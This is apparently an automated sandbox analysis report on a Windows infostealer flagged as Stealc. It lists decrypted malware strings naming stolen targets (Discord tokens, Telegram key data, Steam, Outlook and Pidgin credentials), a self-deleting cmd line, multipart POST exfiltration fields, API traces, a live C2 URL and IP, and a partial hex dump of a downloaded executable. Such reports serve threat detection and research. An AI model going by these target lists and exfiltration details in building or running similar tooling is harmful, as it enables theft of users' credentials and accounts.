                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - OS:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Architecture:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - UserName:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Computer Name:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Local Time:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - UTC:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Language:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Keyboards:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Laptop:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Running Path:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - CPU:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Threads:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Cores:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - RAM:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - Display Resolution:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: - GPU:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: User Agents:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Installed Apps:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: All Users:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Current User:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Process List:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: system_info.txt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: freebl3.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: mozglue.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: msvcp140.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: nss3.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: softokn3.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: vcruntime140.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Temp\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: .exe
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: runas
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: open
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: /c start
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %DESKTOP%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %APPDATA%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %LOCALAPPDATA%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %USERPROFILE%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %DOCUMENTS%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %PROGRAMFILES_86%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: %RECENT%
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: *.lnk
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: files
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \discord\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Local Storage\leveldb\CURRENT
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Local Storage\leveldb
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Telegram Desktop\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: key_datas
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: D877F783D5D3EF8C*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: map*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: A7FDF864FBC10B77*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: A92DAA6EA6F891F2*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: F8806DD0C461824F*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Telegram
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Tox
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: *.tox
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: *.ini
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Password
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000001
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000002
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000003
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: 00000004
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Outlook\accounts.txt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Pidgin
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \.purple\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: accounts.xml
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: dQw4w9WgXcQ
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: token:
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Software\Valve\Steam
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: SteamPath
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \config\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ssfn*
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: config.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DialogConfig.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: libraryfolders.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: loginusers.vdf
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Steam\
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: sqlite3.dll
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: done
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: soft
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: \Discord\tokens.txt
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: https
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: POST
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: HTTP/1.1
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: hwid
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: build
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: token
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: file_name
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: file
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: message
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 1.2.ED60.tmp.exe.400000.0.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00404C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,1_2_00404C50
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_004242C0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,1_2_004242C0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_004060D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,lstrcatA,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,GetProcessHeap,HeapAlloc,lstrlenA,memcpy,lstrlenA,lstrlenA,memcpy,lstrlenA,HttpSendRequestA,InternetReadFile,lstrlenA,lstrcpy,lstrcatA,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlenA,lstrcpy,lstrlenA,lstrcpy,lstrcatA,lstrcpy,1_2_004060D0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00407750 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00407750
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00409B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_00409B20
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_00409B80 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_00409B80
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C74EB7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_02C74EB7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C86F20 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,1_2_02C86F20
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C76337 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,1_2_02C76337
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C79DE7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,1_2_02C79DE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C7EDE7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,1_2_02C7EDE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C79D87 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_02C79D87
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C779B7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_02C779B7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C86D07 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,strtok_s,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,StrStrA,lstrlen,malloc,strncpy,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,strtok_s,lstrlen,lstrcpy,memset,1_2_02C86D07
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C94527 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_02C94527

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeUnpacked PE file: 0.2.6X4BIzTTBR.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeUnpacked PE file: 1.2.ED60.tmp.exe.400000.0.unpack
                  Source: 6X4BIzTTBR.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C84ED7 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C84ED7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C84EF0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C84EF0
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8E657 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8E657
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81607 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81607
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81620 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C81620
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C83CD7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C83CD7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C81C57 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C81C57
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8D037 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C8D037
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C7DDE7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C7DDE7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8D987 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,1_2_02C8D987
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C8E187 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,1_2_02C8E187
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C71907 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,1_2_02C71907
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exeCode function: 1_2_02C71920 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,1_2_02C71920

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49738 -> 92.255.57.88:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://92.255.57.88/7bbacc20a3bd2eb5.php
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Nov 2024 21:47:11 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Tue, 26 Nov 2024 21:45:02 GMTETag: "45e00-627d7c2f13cde"Accept-Ranges: bytesContent-Length: 286208Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec 1a 10 d8 a8 7b 7e 8b a8 7b 7e 8b a8 7b 7e 8b 15 34 e8 8b aa 7b 7e 8b b6 29 fa 8b b5 7b 7e 8b b6 29 eb 8b b2 7b 7e 8b b6 29 fd 8b de 7b 7e 8b 8f bd 05 8b af 7b 7e 8b a8 7b 7f 8b d3 7b 7e 8b b6 29 f4 8b a9 7b 7e 8b b6 29 ea 8b a9 7b 7e 8b b6 29 ef 8b a9 7b 7e 8b 52 69 63 68 a8 7b 7e 8b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 90 09 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 26 03 00 00 64 65 02 00 00 00 00 06 19 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 68 02 00 04 00 00 e3 e4 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 9c 59 03 00 50 00 00 00 00 b0 67 02 c0 b5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 